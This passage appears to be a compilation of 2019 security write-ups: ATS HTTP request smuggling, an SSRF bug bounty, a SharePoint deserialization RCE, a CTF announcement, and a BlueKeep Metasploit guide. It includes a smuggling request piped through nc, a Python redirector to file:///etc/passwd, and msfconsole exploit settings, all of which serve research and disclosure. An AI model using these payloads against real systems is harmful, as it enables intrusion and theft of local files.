'Host: dummy-host7.example.com\r\n'\
'Cache-control: max-age=300\r\n'\
'Content-Length: 74\r\n'\
'\r\n'\
'GET /index.html?evil=cogip2000 HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
'GET /victim.html?cache=zorglub HTTP/1.1\r\n'\
'Host: dummy-host7.example.com\r\n'\
'\r\n'\
|nc -q 1 127.0.0.1 8001

The query for /victim.html (which should be a 404 in our example) gets the response for /index.html (X-Location-echo: /index.html?evil=cogip2000).

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:41 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?cache=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 12

<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

HTTP/1.1 200 OK
Server: ATS/7.1.1
Date: Fri, 26 Oct 2018 16:05:53 GMT
Content-Type: text/html
Content-Length: 120
Last-Modified: Fri, 26 Oct 2018 14:16:28 GMT
ETag: "5bd321bc-78"
X-Location-echo: /index.html?evil=cogip2000
X-Default-VH: 0
Cache-Control: public, max-age=300
Accept-Ranges: bytes
Age: 0

<html><head><title>Nginx default static page</title></head>
<body><h1>Hello World</h1>
<p>It works!</p>
</body></html>

Here the issue is critical, especially because there is no invalid syntax in the attacking query. We have an HTTP response splitting, which means two main impacts:
- ATS may be used to poison or hurt an actor in front of it;
- the second query is hidden (it's a body — binary garbage for an HTTP actor), so any security filter set in front of ATS cannot block it.
We could use that to hide a second layer of attack, like an ATS cache poisoning as described in the other attacks. Now that you have a working lab you can try embedding several layers of attacks... That's what the "Drain the request body if there is a cache hit" fix is about.

To better understand the real-world impact: here the only one receiving response B instead of C is the attacker. HaProxy is not a cache, so the C-request/B-response mix-up on HaProxy is not a real direct threat. But if there is a cache in front of HaProxy, or if we use several chained ATS proxies...

Timeline
2017-12-26: Report to project maintainers
2018-01-08: Acknowledgment by project maintainers
2018-04-16: Version 7.1.3 with most of the fixes
2018-08-04: Versions 7.1.4 and 6.2.2 (officially containing all the fixes, and some other CVE fixes)
2018-08-28: CVE announcement
2019-09-17: This article (yes, the URL date is wrong; the real date is September)

See also
Video Defcon 24: HTTP Smuggling
Defcon support
Video Defcon demos

Source: https://regilero.github.io/english/security/2019/10/17/security_apache_traffic_server_http_smuggling/
  21. SSRF | Reading Local Files from DownNotifier server
Posted on September 18, 2019 by Leon

Hello guys, this is my first write-up and I would like to share it with the bug bounty community; it's an SSRF I found some months ago.

DownNotifier is an online tool to monitor website downtime. It sends an alert to a registered email and by SMS when the website is down. DownNotifier has a bug bounty program on Open Bug Bounty, so I decided to take a look at https://www.downnotifier.com. When I browsed the website, I noticed a text field for a URL, and an SSRF vulnerability quickly came to mind.

Getting XSPA

The first thing to do is enter http://127.0.0.1:22 in the "Website URL" field, select "When the site does not contain a specific text" and write some random text. I sent that request and two emails arrived in my mailbox a few minutes later: the first alerting that a website is being monitored, and the second alerting that the website is down, but with the response inside an HTML file. And what is the response...?

Getting Local File Read

I was excited, but that's not enough to fetch very sensitive data, so I tried the same process with some URI schemes such as file, ldap, gopher, ftp and ssh, but it didn't work. I was thinking about how to bypass that filter and remembered a write-up mentioning a bypass using a redirect with the Location header in a PHP file hosted on your own domain. I hosted a PHP file with the above code and repeated the process of registering a website to monitor. A few minutes later an email arrived in the mailbox with an HTML file. And the response was...

I reported the SSRF to DownNotifier support and they fixed the bug very quickly. I want to thank the DownNotifier support team because they were very kind in our communication and allowed me to publish this write-up. I also want to thank the bug bounty hunter who wrote the write-up where he used the redirect technique with the Location header.
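The redirect trick works because the target validates the scheme of the submitted URL but follows redirects blindly. A minimal sketch of such a redirector follows (the original write-up used a PHP file; this Python stand-in, the port, and the file:// target are assumptions for illustration):

```python
# Minimal redirector sketch: the monitored URL looks like a harmless
# http:// address, but answers with a Location header pointing at a
# scheme the target's input filter would have rejected up front.
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

REDIRECT_TO = "file:///etc/passwd"   # scheme the input filter blocks

class Redirector(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", REDIRECT_TO)
        self.end_headers()

    def log_message(self, *args):    # keep the demo quiet
        pass

def serve(port: int = 8080) -> HTTPServer:
    """Start the redirector in a background thread and return the server."""
    srv = HTTPServer(("0.0.0.0", port), Redirector)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv
```

You would then register the redirector's plain http:// URL as the site to monitor; when the back-end fetches it and follows the 302, the filtered scheme is reached anyway.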
Write-up: https://medium.com/@elberandre/1-000-ssrf-in-slack-7737935d3884
Source: https://www.openbugbounty.org/blog/leonmugen/ssrf-reading-local-files-from-downnotifier-server/
  22. CVE-2019-1257: Code Execution on Microsoft SharePoint Through BDC Deserialization
September 19, 2019 | The ZDI Research Team

Earlier this year, researcher Markus Wulftange (@mwulftange) reported a remote code execution (RCE) vulnerability in Microsoft SharePoint that ended up being patched as CVE-2019-0604. He wasn't done. In September, three additional SharePoint RCEs reported by Markus were addressed by Microsoft: CVE-2019-1295, CVE-2019-1296, and CVE-2019-1257. This blog looks at that last CVE, also known as ZDI-19-812, in greater detail. This bug affects all supported versions of SharePoint and received Microsoft's highest Exploit Index rating, which means they expect to see active attacks in the near future.

Vulnerability Details

The Business Data Connectivity (BDC) Service in Microsoft SharePoint 2016 is vulnerable to arbitrary deserialization of XmlSerializer streams due to arbitrary method parameter types in the definition of custom BDC models. As shown by Alvaro Muñoz & Oleksandr Mirosh in their Black Hat 2017 talk [PDF], arbitrary deserialization of XmlSerializer streams can result in arbitrary code execution.

SharePoint allows the specification of custom BDC models using the Business Data Connectivity Model File Format (MS-BDCMFFS) data format. Part of this specification is the definition of methods and parameters. Here is an example excerpt, as provided by Microsoft:

This defines a method named GetCustomer that wraps a stored procedure named sp_GetCustomer (see the RdbCommandText property). Both the input parameters (Direction="In") and return parameters (Direction="Return") are defined with their respective type descriptions. In the example shown above, the input parameter has the primitive type System.Int32, which is safe. The problem occurs if a BDC model is defined that has a parameter of type Microsoft.BusinessData.Runtime.DynamicType.
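The dangerous variant might look roughly like the following trimmed, illustrative fragment (the element layout follows the MS-BDCMFFS examples referenced above; the exact attribute names and the second parameter here are assumptions for illustration, not Microsoft's verbatim sample):

```xml
<Method Name="GetCustomer">
  <Properties>
    <Property Name="RdbCommandText" Type="System.String">sp_GetCustomer</Property>
  </Properties>
  <Parameters>
    <!-- Safe: a primitive input type -->
    <Parameter Direction="In" Name="@CustomerId">
      <TypeDescriptor TypeName="System.Int32" Name="CustomerId" />
    </Parameter>
    <!-- Dangerous: lets the caller supply an arbitrary XmlSerializer stream -->
    <Parameter Direction="In" Name="@CustomerData">
      <TypeDescriptor TypeName="Microsoft.BusinessData.Runtime.DynamicType" Name="CustomerData" />
    </Parameter>
  </Parameters>
</Method>
```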
This would be done to allow the caller the flexibility to pass many different types of values for that parameter. The result is deserialization of an arbitrary XmlSerializer stream provided by the caller.

The Exploit

This vulnerability was tested on Microsoft SharePoint Server 2016 with KB4464594 installed, running on top of the 64-bit version of Windows Server 2016 update 14393.3025. To demonstrate exploitation, these steps are required:

1: An administrator must define a custom BDC model that includes a method with a parameter of type Microsoft.BusinessData.Runtime.DynamicType. For the custom BDC model, the Database Model example was used as a template and heavily reduced.

2: The administrator must then upload the BDC model via SharePoint Central Administration | Application Management | Manage service applications | Business Data Connectivity Service. Alternatively, this can also be accomplished via PowerShell.

3: The attacker can then invoke the method, passing a payload in the parameter.

On the SharePoint server, you will find that two instances of cmd.exe and one instance of win32calc.exe have been spawned, running under the identity of the SharePoint application pool. To see the path through the code, attach a debugger to w3wp.exe for the SharePoint application. Setting a breakpoint at System.Web.dll!System.Web.UI.ObjectStateFormatter.Deserialize reveals the following call stack:

Conclusion

Successful exploitation of this won't get you admin on the server, but it will allow an attacker to execute their code in the context of the SharePoint application pool and the SharePoint server farm account. According to Microsoft, they addressed this vulnerability in the September patch by correcting how SharePoint checks the source markup of application packages. Thanks again to Markus for this submission, and we hope to see more reports from him in the future.
The September release also included a patch to fix a bug in Azure DevOps (ADO) and Team Foundation Server (TFS) that could allow an attacker to execute code on the server in the context of the TFS or ADO service account. We'll provide additional details of that bug in the near future. Until then, follow the team for the latest in exploit techniques and security patches.

Source: https://www.zerodayinitiative.com/blog/2019/9/18/cve-2019-1257-code-execution-on-microsoft-sharepoint-through-bdc-deserialization
  23. When I find the time I will do some cleanup (without regard for the seniority or usefulness of users who mock and swear). Although this is not the best question, show some intelligence and offer an answer that helps the asker understand how things work.
  24. Bitdefender is proud to announce PwnThyBytes Capture The Flag – our competitive ethical hacking contest
September 17, 2019 | 2 Min Read

We hope you've all enjoyed your summer holidays, chilling out on the beach, seeing new places and recharging your batteries, because this autumn we've prepared the first edition of PwnThyBytes CTF, a top-notch global computer security competition which we hope will be a fun and challenging experience for everybody. The contest starts on September 28th and we're hyped to give you a sneak peek at what to expect.

Information security competitions, such as capture the flag (CTF) contests, have surged in popularity during the past decade. Think of them almost like e-sports for ethical hacking. In line with our mission to safeguard users' data, we at Bitdefender host this event to bring together some of the most skilled teams around the world in areas such as Reverse Engineering, Binary Exploitation, Web Application Auditing, Computer Forensics Investigation, and Cryptography.

We extend a warm invitation to everyone connected to or interested in computer security. Build up a team of friends or seasoned professionals, or even have at it by yourself if that's your thing. Pit yourselves against the most seasoned security professionals on the CTF scene. Enjoy the experience of displaying your techniques, learning new skills, competing with kindred spirits, all for the chance of claiming the rewards and the glory that comes with them.

Do you like delving deep into programs, websites, and anything related to computers? Do you like challenging yourself for the pleasure of improvement? Do you want to see just how good you are compared to the rest? If any of these questions strikes a nerve, click here to register. We look forward to seeing you showcase your skills!

What do I need to know?
Some skills/knowledge you'll need throughout the competition:
- Systems programming and OS internals (Linux, Windows), executable format knowledge (ELF, PE)
- Reverse engineering: anti-reversing techniques, anti-debugging techniques, packers, obfuscation, kernel modules
- Architectures: x86, x86_64, ARM, WebAssembly
- Vulnerability analysis and exploitation of binaries
- Web application auditing
- Computer forensics investigation: memory forensics, software-defined radio, file system forensics
- Cryptography: symmetric, asymmetric, post-quantum schemes and general math skills
- Graph algorithms

What are the prizes?
1st place: 2,048 €
2nd place: 1,024 €
3rd place: 512 €

Source: https://labs.bitdefender.com/2019/09/bitdefender-is-proud-to-announce-pwnthybytes-capture-the-flag-our-competitive-ethical-hacking-contest/
  25. How to Exploit the BlueKeep Vulnerability with Metasploit
Sep 10, 2019 • Razvan Ionescu, Stefan Bratescu, Cristin Sirbu

In this article we show our approach to exploiting the RDP BlueKeep vulnerability using the recently proposed Metasploit module. We show how to obtain a Meterpreter shell on a vulnerable Windows 2008 R2 machine by adjusting the Metasploit module code (the GROOMBASE and GROOMSIZE values), because the exploit does not currently work out of the box. Further on, we explain the steps we took to make the module work properly on our target machine:

Background
Prerequisites
Installing the BlueKeep exploit module in Metasploit
Preparing the target machine
Adjusting the BlueKeep exploit
Running the exploit module
Conclusions

1. Background

BlueKeep is a critical remote code execution vulnerability in Microsoft's RDP service. Since the vulnerability is wormable, it has caught a great deal of attention from the security community, being in the same category as EternalBlue (MS17-010) and Conficker (MS08-067). You can read an in-depth analysis of the BlueKeep vulnerability in our blog post.

A few days ago a Metasploit contributor, zerosum0x0, submitted a pull request to the framework containing an exploit module for BlueKeep (CVE-2019-0708). The Rapid7 team has also published an article about this exploit on their blog. As of now, the module is not yet integrated into the main Metasploit branch (it's still a pull request) and it only targets Windows 2008 R2 and Windows 7 SP1, 64-bit versions. Furthermore, the module is currently ranked as Manual, since the user needs to provide additional information about the target; otherwise it risks crashing the target with a BSOD.

Full article: https://pentest-tools.com/blog/bluekeep-exploit-metasploit/
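The adjustment described above happens inside msfconsole; a rough sketch of the session might look like this (module path as it appeared in the pull request; the IP address and the GROOMBASE/GROOMSIZE values are placeholders that must be derived from your own lab target, not working defaults):

```
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS 192.168.1.100          # lab target IP (placeholder)
show targets                      # pick the entry matching the exact OS/VM type
set target 2
set GROOMBASE 0xfffffa8002407000  # placeholder: NPP start address of YOUR target
set GROOMSIZE 250                 # placeholder: tune per target memory layout
run
```

Getting GROOMBASE wrong is exactly what produces the BSOD mentioned above, which is why the module is ranked Manual.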